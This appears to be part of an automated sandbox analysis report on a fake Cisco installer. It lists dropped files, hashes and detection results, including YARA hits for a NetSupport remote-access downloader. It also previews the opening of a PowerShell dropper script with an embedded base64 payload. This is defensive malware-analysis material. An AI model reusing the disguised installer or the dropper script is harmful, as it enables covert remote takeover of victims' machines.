                                                                                                                                                                                                  SHA1:84BB1CECDD38FD203D2EE9691902C3FCCBDED366
                                                                                                                                                                                                  SHA-256:9EFBDCAD9BCD5A9B81AEA9B4643AD13799844117D8F41AA86882F808603037A2
                                                                                                                                                                                                  SHA-512:5C69EED3D00807A5ED8CB17981B23B50A4152E9044883DBB875011709C359CED146A83F740F0158E05C9C7ECE9AC52F5F9B15DE6128EE352A2424A7639708426
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:; vpnva-6.inf..;..; Cisco AnyConnect Virtual Miniport Adapter for Windows Setup File..;..; (c) Copyright 2004-2021 Cisco Systems, Inc.....[version]..Signature = "$Windows NT$"..Class = Net..ClassGUID = {4d36e972-e325-11ce-bfc1-08002be10318}..Provider = %Cisco%..CatalogFile = vpnva-6.cat..DriverVer = 12/14/2021,4.10.05040.0....[Manufacturer]..%CISCO%..= Cisco, NTamd64....[ControlFlags]..ExcludeFromSelect = *....[Cisco]..%vpnva.DeviceDesc% = Cisco.ndi.NTx86, vpnva....[Cisco.NTamd64]..%vpnva.DeviceDesc64% = Cisco.ndi.NTamd64, vpnva....[Cisco.ndi.NTx86]..Characteristics = 0x01 ; NCF_VIRTUAL..;BusType not required because this is not NCF_PHYSICAL..*IfType = 6 ; IF_TYPE_ETHERNET_CSMACD..*MediaType = 0 ; NdisMedium802_3..*PhysicalMediaType = 0 ; NdisPhysicalMediumUnspecified..AddReg...= Cisco.reg..CopyFiles..= Cisco.CopyFiles....[Cisco.ndi.NTamd64]..Characteristics = 0x01 ; NCF_VIRTUAL..;BusType not required because this is not NC
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):54176
                                                                                                                                                                                                  Entropy (8bit):6.343089804418659
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:/eDOHgIUkjxLqAW2ltHbfvFSzNhQxVBqv5jJwPB2M:2KHgIUkjxLqAW2l5vFSzNiqv51m
                                                                                                                                                                                                  MD5:98B8845F3554BAD1329541D54EADD3F0
                                                                                                                                                                                                  SHA1:FDB21CC76F860AB39D265A01846C81A707078BBB
                                                                                                                                                                                                  SHA-256:506AB485FE0DA85C6DF6D0B7ABBAD412ACA6A8EB3F575DFC2C81662107054792
                                                                                                                                                                                                  SHA-512:12D14D027679FE76820148D51A9B8AEAF5D024C5D49A85238B2D70780D05F046EEAB1F7A7EC8E50EE64851E3D9033443FF64E01FBCA35AE1AE56E5D09F4BB8D3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y=MA8S.A8S.A8S.USR.D8S.A8R.l8S.USP.E8S.USW.D8S..M[.D8S..M..@8S..MQ.@8S.RichA8S.................PE..d......a.........."............................@....................................#M....`a................................................|...<.......H................!...... .......T..............................................x............................text...bu.......v.................. ..h.rdata..|............z..............@..H.data...............................@....pdata..............................@..HPAGE................................ ..`INIT................................ ..b.rsrc...H...........................@..B.reloc.. ...........................@..B................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):89192
                                                                                                                                                                                                  Entropy (8bit):7.008180217438666
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:YWM3/1/n8silQ0Fu/ILuhcWnToIfJ9IOlIOOCxf8z5xP9YFxKQ:Je/8hWiuwLuhPTBfJ3vOCxf8JvQ
                                                                                                                                                                                                  MD5:DDD6A5364B689408B502CA21276645E1
                                                                                                                                                                                                  SHA1:B9B7643A8ADC0C1C0170DEB4834079572A0EC8D5
                                                                                                                                                                                                  SHA-256:6613A22498BD14CD46AC678F7B50675A084CA04FA923FE8F6D731C1CB703C324
                                                                                                                                                                                                  SHA-512:26661FD5918F6FDBA5C08C260534E484DC1D79A45E4797E64482B7B2E2CA8EBA1B6427984CF6072C08D5A88A3CA154F7DD1DAE73E91CB5A1D80B85B9B3DE10AC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m...)...)...)... .!.#...{..*...O.O.-...{.."...{..#...{..(...=...+...)..........&......(.....M.(...).%.(......(...Rich)...................PE..L......d...........!.........b...............................................P......2q....@A........................@...`............0..X...............hH...@......T...T...............................@............................................text...f........................... ..`.rdata..nQ.......R..................@..@.data........ ......................@....rsrc...X....0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3572797
                                                                                                                                                                                                  Entropy (8bit):6.528409328427541
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:iJYVM+LtVt3P/KuG2ONG9iqLRQf333f5va:zVL/tnHGYiqlN
                                                                                                                                                                                                  MD5:CE7CF9ABC22DF2C802EF4938FADCB50A
                                                                                                                                                                                                  SHA1:F324AD2E8A1FF30F422EB3BB13B8E80B98BBDCAF
                                                                                                                                                                                                  SHA-256:0F0DAB61B8063CCB7AD2D178B5116A93031DB0721CCAA2B2538C79738407543C
                                                                                                                                                                                                  SHA-512:DF3BEF6A84F0FFF93735FA589452039F1BA38C77D8B03E81C3CEC77DA4C03E45EF5094DC8588A58B9D3742A7E63B9D9EA40A88A6013DCA9CF7A452ACBD3EB413
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*..`........*.......*...@...........................7...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:InnoSetup Log Cisco Systems {502F2F47-B99C-4049-8968-7EC11BF4EBD6}, version 0x418, 6157749 bytes, 141700\37\user\37, C:\Program Files (x86)\Cisco\376\377\377\0
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6157749
                                                                                                                                                                                                  Entropy (8bit):4.028674519629248
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:baa1cFHjbj643Ri2rnTwq+4WePF4kP3uim2pfdn99T:E
                                                                                                                                                                                                  MD5:10511CC91DB0564A889867FE583FBB32
                                                                                                                                                                                                  SHA1:CAB6F89BE730164BF2007AA6B523F2443351AF47
                                                                                                                                                                                                  SHA-256:5512004E3E6A7891A7943C017C112A79F0608BB5B469342EECE7A7B5CAA3AE03
                                                                                                                                                                                                  SHA-512:3D17452723DA6ACAB110DA9A733053957CB8C32028E7AA81D1F750B5719F83041D59A3EA8DFA0719B0DF43BEB1CCC622E536A9E887103D619BF771BF815CDD4C
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupportDownloader, Description: Yara detected NetSupport Downloader, Source: C:\Program Files (x86)\Cisco\unins000.dat, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:Inno Setup Uninstall Log (b)....................................{502F2F47-B99C-4049-8968-7EC11BF4EBD6}}.........................................................................................Cisco Systems.......................................................................................................................X.....]..............................................................................................................................v........u........1.4.1.7.0.0......A.r.t.h.u.r......C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.i.s.c.o..................,.v.. .......\...T..IFPS....#........................................................................................................ANYMETHOD.....................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TMAINFORM....TMAINFORM.........TUNINSTALLPROGRESSFORM....TUNINSTALLPROGRESSFORM.........TEXECWAIT.........TSETUPSTEP.....u...........!MAIN....-1.v.....
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3572797
                                                                                                                                                                                                  Entropy (8bit):6.528409328427541
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:iJYVM+LtVt3P/KuG2ONG9iqLRQf333f5va:zVL/tnHGYiqlN
                                                                                                                                                                                                  MD5:CE7CF9ABC22DF2C802EF4938FADCB50A
                                                                                                                                                                                                  SHA1:F324AD2E8A1FF30F422EB3BB13B8E80B98BBDCAF
                                                                                                                                                                                                  SHA-256:0F0DAB61B8063CCB7AD2D178B5116A93031DB0721CCAA2B2538C79738407543C
                                                                                                                                                                                                  SHA-512:DF3BEF6A84F0FFF93735FA589452039F1BA38C77D8B03E81C3CEC77DA4C03E45EF5094DC8588A58B9D3742A7E63B9D9EA40A88A6013DCA9CF7A452ACBD3EB413
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*..`........*.......*...@...........................7...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Thu Oct 31 16:05:48 2024, mtime=Thu Oct 31 16:05:48 2024, atime=Tue Aug 15 15:45:32 2023, length=3058280, window=hide
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1482
                                                                                                                                                                                                  Entropy (8bit):4.488169065827841
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:8mrsFdOEa2MgnqNei3EAw8Md/731d/kmfUUlne3tEJTvm:8mrsFdOHzkqNe0Tw8Md/z1d/kmMieUTv
                                                                                                                                                                                                  MD5:1E5545AF627A509BA1368C6151B25474
                                                                                                                                                                                                  SHA1:E0378E61868532CA2CF1B5FA867A1B203EA612D0
                                                                                                                                                                                                  SHA-256:3542099E80440F4CDE670453785B59DCBDC142F8F635FB1638C2B7745A176EB3
                                                                                                                                                                                                  SHA-512:93D5D8719D2CEEE5B928AA27C421FD8BD33BC8C5FD812E307BA73262BC59ABFB45358EA06534768E9F847B16F7A36694153ED7CD81F6BCDDAFE240561DA056E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:L..................F.... ....}.!.+..+..!.+.........h......................./....P.O. .:i.....+00.../C:\.....................1....._Y....PROGRA~2.........O.I_Y...... t..............V.......m.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....P.1....._Y....Cisco.<......_Y.._Y.......U....................1zP.C.i.s.c.o.....p.1....._Y....CISCOS~1..X......_Y.._Y.......W...................._L..C.i.s.c.o. .S.e.c.u.r.e. .C.l.i.e.n.t.....H.1....._Y....UI..6......_Y.._Y......X_....................(K..U.I.....`.2.h....W.. .csc_ui.exe..F......_Y.._Y......._........................c.s.c._.u.i...e.x.e.......m...............-.......l...........p".......C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui.exe..M.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.i.s.c.o.\.C.i.s.c.o. .S.e.c.u.r.e. .C.l.i.e.n.t.\.U.I.\.c.s.c._.u.i...e.x.e.3.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.i.s.c.o.\.C.i.s.c.o. .S.e.c.u.r.e. .C.l.i.e.n.t.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                  Entropy (8bit):3.077819531114783
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:llD:b
                                                                                                                                                                                                  MD5:C40449C13038365A3E45AB4D7F3C2F3E
                                                                                                                                                                                                  SHA1:CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
                                                                                                                                                                                                  SHA-256:1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
                                                                                                                                                                                                  SHA-512:3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:40.7357,-74.1724
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1476
                                                                                                                                                                                                  Entropy (8bit):5.263393507017003
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:3JSGfbo4KMjKbm4r1od6lss4RPQoUP7mZ9txNBJt/NKwJ0hNpr8HJ9nPAl/:5SGfs4/ymKagv4RIoUP7mZ9trBLNGhNz
                                                                                                                                                                                                  MD5:526A97643E029C6623305EBFF6469FBC
                                                                                                                                                                                                  SHA1:492A91F93D9175A7D891BAC7B554800A68740E80
                                                                                                                                                                                                  SHA-256:39370C908D2F2FCDE417A4C71A6DBD69EC48994B7DB0D6596B0F67811B497AE9
                                                                                                                                                                                                  SHA-512:072C6A7A1D0B2C91CD3B5307D719E353E70EDED884506F6EF63402E8EBA265165DE6B4ECFCA0BB77189E9BBBE3ABED9798E03D3EE6B12BC6561FEA94D428B825
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:@...e...........,...............................................@...............|.jdY\.H.s9.!..|+.......System.IO.Compression...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0...............I.....B..ZR............System..4......................A....E..........System.Core.D................g$H..K..I.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4..................%`99B....9...........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Commands.Management
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\download\CiscoSetup.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3548672
                                                                                                                                                                                                  Entropy (8bit):6.54053651576307
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:6JYVM+LtVt3P/KuG2ONG9iqLRQf333f5vC:LVL/tnHGYiqlz
                                                                                                                                                                                                  MD5:BFD84005E52425F9B8FE658B9663E1C4
                                                                                                                                                                                                  SHA1:49C54A003678DC14A19AC5D07C9BF053B8CD0683
                                                                                                                                                                                                  SHA-256:2EA785B8A4CF5C5FC457350A4C636DAC40137269A1A93D24C1083F1F77324D5D
                                                                                                                                                                                                  SHA-512:3E4E2A32F50C6BB200AF8A37C8653EF55E6D8FF47042266181546FD1CCF125A4FD5D2B7D8801D9179BF5E899C4992092895EE6F0D3F4E11AC8D5A1F40E5F82BF
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*..`........*.......*...@...........................7...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6144
                                                                                                                                                                                                  Entropy (8bit):4.720366600008286
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                  MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                  SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                  SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                  SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65337), with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3035662
                                                                                                                                                                                                  Entropy (8bit):5.9992843080053095
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:Ae6uUAecyy1q8n4RkErBHwnnDkKKr9r6riooJc98haMA:f
                                                                                                                                                                                                  MD5:2D47F35F6EC3ABDFA6DF92CB13BEF294
                                                                                                                                                                                                  SHA1:16E532CAAC6B7176369F5FA29A869FFA0DEF8947
                                                                                                                                                                                                  SHA-256:85C3C72A135EE57914D27C563E9AE31F417AF72FA04AB2D3A09F10EB674455CB
                                                                                                                                                                                                  SHA-512:E6BE961E4F384749F621E3B14F2B1468F3218480DE3EEAA0C7A6448F70911FC942B30D1C135729EDEA9BD489C8B5F42FD255617A79428568DF2A58F9D6C0E134
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupportDownloader, Description: Yara detected NetSupport Downloader, Source: C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:$ErrorActionPreference = "Stop";..Set-Location $Env:AppData;..$destinationPath = "$Env:AppData\Cisco";..if (Test-Path $destinationPath) {.. Remove-Item "$Env:AppData\temp_base64.txt";.. Exit;..};..$base64Content = "UEsDBBQACAAIAPAw5zYAAAAAAAAAAEgBAAAMACAAbnNrYmZsdHIuaW5mVVQNAAd0A49GGaUPZ3QDj0Z1eAsAAQQAAAAABAAAAABVj8GKwkAMhu8D8w5BPG4LHjxJTyu9KEVo2R6WRaZORoPjDGRGi2+/01oLhhxCkv//kg24cO2MjZyTM1JsUkJVww6fnVesoSQbkYfuNGwuFCDtgiGLqQhRWRsgXhDabQklqxv2nq/QkVNMGKSQ4vcHOZB3f1LUdHYq3hmLxbIlp30foGqWCykO7B+kkYuq3g+iFzDLsvlG+PYTEPmNVjH5QjbGqBh581dVk7faJO7upk2N/KATQjE7fs3Vsdcm4Cl+yN/NSb+njhU/p2eSzSpfD/tS/ANQSwcI96jtkdUAAABIAQAAUEsDBBQACAAIAI4MBVcAAAAAAAAAAAMBAAAHACAATlNNLkxJQ1VUDQAHbH3NZGx9zWRsfc1kdXgLAAEEAAAAAAQAAAAALY/RTkIxDIbvm+wd9gLKtoMKml0Chig3xAtDyMkcJSzObukGHt7eM7W9+r82X1NtlBKgBofu44h3XoCAJ7nBuj3nnLjKl+CRCspliHjbZiskZFfxIBNJ3T3qe3kj9Xyi5hOj9EMTtN7tFnRM7HG//439v2hMPlHlFPtE8WrH6zjkwFcrIJDzNVywwfi3jna1fF6v39+mnYAvN5ToLlisVq0EpGKsFpA5Hc6+jlhAQQ4u9pTsZvs668zUzEZ44kCf/Te73OSVHZX2nlUCfgBQSwcIFelrJc4
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):93560
                                                                                                                                                                                                  Entropy (8bit):6.5461580255883876
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:wrOxDJs/Ksdl0R1dBmhFXxRpP9JNvbnPUGI:3yXlQmhhHp9J9bnPTI
                                                                                                                                                                                                  MD5:4182F37B9BA1FA315268C669B5335DDE
                                                                                                                                                                                                  SHA1:2C13DA0C10638A5200FED99DCDCF0DC77A599073
                                                                                                                                                                                                  SHA-256:A74612AE5234D1A8F1263545400668097F9EB6A01DFB8037BC61CA9CAE82C5B8
                                                                                                                                                                                                  SHA-512:4F22AD5679A844F6ED248BF2594AF94CF2ED1E5C6C5441F0FB4DE766648C17D1641A6CE7C816751F0520A3AE336479C15F3F8B6EBE64A76C38BC28A02FF0F5DC
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dll, Author: Joe Security
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..in.:n.:n.:g.6:|.:g. :".:g.':J.:g.0:i.:n.:5.:g.):i.:g.1:o.:p.7:o.:g.2:o.:Richn.:........PE..L......U...........!.........j.......S............0.................................5f..............................@*..-...."..P....P..X............D..x)...`..4...p...................................@...............@............................text............................... ..`.rdata..m;.......<..................@..@.data........0......................@....rsrc...X....P.......$..............@..@.reloc..T....`.......,..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):328056
                                                                                                                                                                                                  Entropy (8bit):6.754723001562745
                                                                                                                                                                                                  Encrypted:false
